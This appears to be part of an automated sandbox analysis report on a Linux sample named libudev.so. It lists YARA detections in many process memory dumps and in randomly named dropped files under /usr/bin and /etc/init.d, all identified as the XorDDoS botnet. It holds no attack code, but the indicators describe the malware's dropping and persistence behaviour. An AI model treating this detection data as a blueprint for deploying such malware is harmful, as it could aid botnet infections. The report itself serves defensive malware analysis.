              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6351, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6354, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6359, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6362, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6369, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6372, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6375, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6377, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6388, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6391, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6393, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6396, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6399, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6407, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6410, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6413, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6415, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6418, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6424, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6427, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6430, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6432, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6435, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6441, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6444, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6447, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6450, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6452, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6459, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6462, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6464, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6470, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6476, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6479, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6482, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: libudev.so PID: 6484, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/hfdnmorvjd, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ctwojuywol, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cjrbrkowir, type: DROPPED
              Source: Yara matchFile source: /usr/bin/bnuowhwlvc, type: DROPPED
              Source: Yara matchFile source: /usr/bin/trcmbxxcta, type: DROPPED
              Source: Yara matchFile source: /usr/bin/fsqerkomug, type: DROPPED
              Source: Yara matchFile source: /usr/bin/chrcfbeejh, type: DROPPED
              Source: Yara matchFile source: /usr/bin/jjfbelholv, type: DROPPED
              Source: Yara matchFile source: /usr/bin/mljnlxkfff, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tiupbsaswr, type: DROPPED
              Source: Yara matchFile source: /etc/init.d/libudev.so, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uhyqxsqece, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uijxdyxaco, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ypclxoxcxk, type: DROPPED

              System Summary

              barindex
              Source: libudev.so, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
              Source: libudev.so, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6399.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6232.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6554.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6271.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6468.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6484.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6495.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6339.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6523.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6318.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6517.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6536.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6512.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6410.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/hfdnmorvjd, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/ctwojuywol, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/ctwojuywol, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/cjrbrkowir, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/cjrbrkowir, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/bnuowhwlvc, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/bnuowhwlvc, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/trcmbxxcta, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/trcmbxxcta, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/fsqerkomug, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/fsqerkomug, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/chrcfbeejh, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/chrcfbeejh, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/jjfbelholv, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/jjfbelholv, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/mljnlxkfff, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/mljnlxkfff, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/tiupbsaswr, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/tiupbsaswr, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /etc/init.d/libudev.so, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /etc/init.d/libudev.so, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/uhyqxsqece, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/uhyqxsqece, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/uijxdyxaco, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/uijxdyxaco, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/ypclxoxcxk, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/ypclxoxcxk, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: libudev.so, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: libudev.so, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: 6459.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6391.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6479.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6515.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6498.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6369.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6413.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6233.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6520.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6280.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6450.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6530.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6289.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6551.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6541.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6283.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6396.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6407.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6452.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6501.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6362.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6230.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6506.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6324.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6321.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6372.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6234.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6342.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6306.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6359.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6291.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6462.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6377.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6309.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6301.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6418.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6415.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6489.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6432.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6375.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6539.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6286.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6273.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6334.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 6476.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
